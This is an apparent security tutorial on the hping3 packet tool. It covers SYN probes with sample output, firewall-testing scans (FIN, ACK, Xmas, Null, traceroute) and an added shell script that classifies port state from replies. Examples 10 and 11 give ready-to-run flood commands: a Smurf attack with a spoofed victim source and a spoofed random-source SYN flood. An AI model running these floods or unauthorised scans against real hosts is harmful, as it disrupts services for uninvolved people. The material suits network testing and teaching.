information gathering – hping

hping is a command-line oriented TCP/IP packet assembler/analyzer. The interface is inspired by the ping(8) unix command, but hping isn't only able to send ICMP echo requests. It supports TCP, UDP, ICMP and RAW-IP protocols, has a traceroute mode, the ability to send files over a covert channel, and many other features.

hping3 builds raw packets, so unless you are already running as root you will need sudo. On BackTrack you are root, so drop the sudo.

sudo hping3 -c 1 -V -I tap0 -p 445 -S 192.168.0.100
using tap0, addr: 192.168.0.1, MTU: 1500
HPING 192.168.0.100 (tap0 192.168.0.100): S set, 40 headers + 0 data bytes
len=46 ip=192.168.0.100 ttl=128 DF id=1315 tos=0 iplen=44
sport=445 flags=SA seq=0 win=64240 rtt=0.6 ms
seq=2232013429 ack=25004686 sum=9f2f urp=0

— 192.168.0.100 hping statistic —
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 0.6/0.6/0.6 ms

The reply carries flags=SA (SYN/ACK), so TCP 445 is open on the target; a closed port would answer with flags=RA (RST/ACK). For a physical NIC, use eth0 instead of the tap0 interface:

sudo hping3 -c 1 -V -I eth0 -p 445 -S 192.168.0.100

-c = count (number of packets to send)
-V = verbose
-I = network interface to use
-S = set the SYN flag
-p = destination port
-1 = ICMP mode (instead of the default TCP)

Testing firewall rules with Hping3 – examples
Mon, 05 Jul 2010

1. Testing ICMP: In this example hping3 behaves like a normal ping utility, sending ICMP echo requests and receiving ICMP echo replies.
hping3 -1 0daysecurity.com

2. Traceroute using ICMP: This example is similar to well-known utilities like tracert (Windows) or traceroute (Linux), which send ICMP packets with a TTL that increases by 1 each time.
hping3 --traceroute -V -1 0daysecurity.com

3. Checking a port: Here hping3 sends a SYN packet to the specified port (80 in our example). We can also control the local port the scan starts from (5050). A reply with flags=SA means the port is open, flags=RA means it is closed, and no reply at all usually means a firewall dropped the probe.
hping3 -V -S -p 80 -s 5050 0daysecurity.com

4. Traceroute to a specific port: A nice feature of hping3 is that you can traceroute to a specified port and watch where your packet gets blocked. Just add --traceroute to the previous command.
hping3 --traceroute -V -S -p 80 -s 5050 0daysecurity.com

5. Other types of ICMP: This example sends an ICMP address mask request (type 17).
hping3 -c 1 -V -1 -C 17 0daysecurity.com

6. Other types of port scanning: The first type we will try is the FIN scan. In a TCP connection the FIN flag is used to start the connection-closing handshake. A FIN sent to a port that has no connection is dropped silently if the port is open, while a closed port answers with RST+ACK. This is RFC 793 behaviour; a firewall that drops the probe also produces silence, so no reply really means open or filtered. Some stacks, Windows among them, answer RST regardless of port state, so the FIN, Xmas and Null scans below only give meaningful results against RFC-compliant hosts.
hping3 -c 1 -V -p 80 -s 5050 -F 0daysecurity.com

7. ACK scan: This scan can be used to see whether a host is alive (when ping is blocked, for example) and whether a port is filtered. An unfiltered port sends RST back whether it is open or closed, so the ACK scan cannot tell those two apart. No reply means a stateful firewall dropped the packet.
hping3 -c 1 -V -p 80 -s 5050 -A 0daysecurity.com

8. Xmas scan: This scan sets the sequence number to zero and sets the URG + PSH + FIN flags in the packet. If the target's TCP port is closed, the target sends a TCP RST in reply. If the port is open, the target discards the Xmas packet and sends no reply.
hping3 -c 1 -V -p 80 -s 5050 -M 0 -UPF 0daysecurity.com

9. Null scan: This scan sets the sequence number to zero and has no TCP flags set. If the target's TCP port is closed, the target sends a TCP RST in reply. If the port is open, the target discards the Null packet and sends no reply. hping3 sends a flagless TCP segment when no flag option is given, so no flag option is needed here; -Y is not a null scan, it sets the reserved 0x80 bit (--ymas).
hping3 -c 1 -V -p 80 -s 5050 -M 0 0daysecurity.com

10. Smurf attack: This is a type of denial-of-service attack that floods a target with ping replies: echo requests are sent to a broadcast address with the source spoofed (-a) to the victim, so every host that answers the broadcast replies to the victim. Most routers now refuse to forward directed broadcasts, which is what made this attack practical.
hping3 -1 --flood -a VICTIM_IP BROADCAST_ADDRESS

11. DoS, LAND-style SYN flood: This sends a stream of 120-byte SYN packets with random spoofed source addresses to port 445, from source port 445. The classic LAND attack is the variant where the source address equals the destination address (-a VICTIM_IP instead of --rand-source) as well as the ports matching, so the victim ends up talking to itself; with --rand-source this is an ordinary spoofed SYN flood.
hping3 -V -c 1000000 -d 120 -S -w 64 -p 445 -s 445 --flood --rand-source VICTIM_IP

* --flood: send packets as fast as possible. Don't show replies.
* --rand-source: random source address mode. See the man page.
* -a --spoof: spoof the source address
* -V: verbose
* -c --count: packet count
* -d --data: data size
* -S --syn: set SYN flag
* -w --win: window size (default 64)
* -p --destport [+][+]<port>: destination port (default 0); ctrl+z increments/decrements it
* -s --baseport: base source port (default random)
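The reply-interpretation rules for the SYN probe in the first session (flags=SA) and for examples 3 and 6 to 9 above, written out as a small classifier. This is an added example, not code from the original post or from hping itself. It reads hping3 output on stdin and prints the port state; the sample reply lines are constructed to match hping3's -V output format, and only the real hping3 command in the usage comment needs the tool installed.

```shell
#!/bin/sh
# Added example, not part of the original post: classify a port from the
# hping3 reply (or lack of one) for the probe types shown above.
# Usage:  sudo hping3 -c 1 -S -p 80 target 2>&1 | hping_port_state syn
# The 2>&1 is a safe habit because hping3 writes its banner and statistic
# lines to stderr; only the reply lines matter here.
#
# Decision table (RFC 793 behaviour, the same one Nmap uses):
#   syn            SA -> open      R/RA -> closed    silence -> filtered
#   fin/xmas/null  R/RA -> closed  silence -> open|filtered (open ports
#                  drop these probes, and so does a dropping firewall)
#   ack            R/RA -> unfiltered (open OR closed)  silence -> filtered

# Print the flags= value of every hping3 reply line, one per line.
hping_reply_flags() {
    grep -o 'flags=[A-Z]*' | sed 's/^flags=//'
}

# hping_port_state PROBE   (reads hping3 output on stdin)
# Prints one of: open, closed, filtered, open|filtered, unfiltered.
hping_port_state() {
    probe=$1
    # Only the first reply matters; with -c 1 there is at most one anyway.
    flags=$(hping_reply_flags | head -n 1)
    case "$probe" in
        syn)
            case "$flags" in
                *S*A*) echo open ;;          # SYN/ACK: a listener accepted
                *R*)   echo closed ;;        # RST: nothing listening
                "")    echo filtered ;;      # dropped somewhere on the path
                *)     echo unknown ;;
            esac ;;
        fin|xmas|null)
            case "$flags" in
                *R*)   echo closed ;;
                "")    echo 'open|filtered' ;;   # ambiguous by design
                *)     echo unknown ;;
            esac ;;
        ack)
            case "$flags" in
                *R*)   echo unfiltered ;;    # a RST proves the packet got through
                "")    echo filtered ;;      # a stateful firewall ate it
                *)     echo unknown ;;
            esac ;;
        *)
            echo "unknown probe type: $probe" >&2
            return 2 ;;
    esac
}

# Constructed sample replies in hping3's -V output format (not captured
# from a real host), so the classifier can be exercised offline.
SAMPLE_SYN_OPEN='len=46 ip=192.168.0.100 ttl=128 DF id=1315 tos=0 iplen=44
sport=445 flags=SA seq=0 win=64240 rtt=0.6 ms
seq=2232013429 ack=25004686 sum=9f2f urp=0'
SAMPLE_SYN_CLOSED='len=46 ip=192.168.0.100 ttl=128 DF id=1316 tos=0 iplen=44
sport=81 flags=RA seq=0 win=0 rtt=0.5 ms'

# Example run: an open port, a closed port, and a silent FIN probe.
printf '%s\n' "$SAMPLE_SYN_OPEN"   | hping_port_state syn    # open
printf '%s\n' "$SAMPLE_SYN_CLOSED" | hping_port_state syn    # closed
printf ''                          | hping_port_state fin    # open|filtered
```

For the FIN, Xmas and Null probes the classifier deliberately reports open|filtered rather than open: the "no reply means open" reading in examples 6, 8 and 9 only holds when nothing between you and the target drops packets, which is exactly the condition you are trying to establish when testing firewall rules.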
